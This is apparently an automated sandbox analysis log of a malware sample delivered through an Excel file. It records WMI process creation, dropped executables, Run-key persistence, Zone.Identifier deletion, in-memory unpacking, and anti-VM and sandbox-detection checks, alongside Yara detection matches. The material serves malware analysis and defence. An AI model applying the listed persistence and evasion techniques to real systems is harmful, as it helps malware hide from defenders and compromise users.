Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR6086.tmp

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\dropped.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\dropped.exe

Mutant created: \Sessions\1\BaseNamedObjects\xpKNGhplpShlV

Source: 3.2.RegSvcs.exe.400000.0.unpack, A/F1.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 3.2.RegSvcs.exe.400000.0.unpack, A/F1.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 3.0.RegSvcs.exe.400000.4.unpack, A/F1.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 3.0.RegSvcs.exe.400000.4.unpack, A/F1.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 3.0.RegSvcs.exe.400000.0.unpack, A/F1.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 3.0.RegSvcs.exe.400000.0.unpack, A/F1.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\dropped.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Data Obfuscation

.NET source code contains potential unpacker

Source: dropped.exe.0.dr, Ug/Va.cs	.Net Code: PQe contains xor as well as GetObject
Source: dropped.exe.0.dr, Ug/Va.cs	.Net Code: tfA System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\AppData\Local\Temp\dropped.exe	Code function: 2_2_007F50C7 pushfd ; ret	2_2_007F50C8
Source: C:\Users\user\AppData\Local\Temp\dropped.exe	Code function: 2_2_007F72F0 push eax; retn 005Eh	2_2_007F72F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_003E03B9 pushfd ; retf 001Ch	3_2_003E0421
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_003E03E2 pushfd ; retf 001Ch	3_2_003E0421
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_003E26D0 push 14003D37h; retf	3_2_003E26D5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00624D50 push eax; iretd	3_2_00624D91
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00624DA0 pushad ; iretd	3_2_00624DE1

Source: initial sample

Static PE information: section name: .text entropy: 7.86212546256

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File created: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Temp\dropped.exe			Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run BINGO			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run BINGO			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File opened: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 00000002.00000002.919772020.0000000002841000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.919684490.0000000002771000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dropped.exe PID: 1980, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: dropped.exe, 00000002.00000002.919772020.0000000002841000.00000004.00000800.00020000.00000000.sdmp, dropped.exe, 00000002.00000002.919684490.0000000002771000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: dropped.exe, 00000002.00000002.919772020.0000000002841000.00000004.00000800.00020000.00000000.sdmp, dropped.exe, 00000002.00000002.919684490.0000000002771000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard

Source: C:\Users\user\AppData\Local\Temp\dropped.exe TID: 1200	Thread sleep time: -31989s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe TID: 1212	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe TID: 2944	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe TID: 940	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\dropped.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 8174			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 708			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
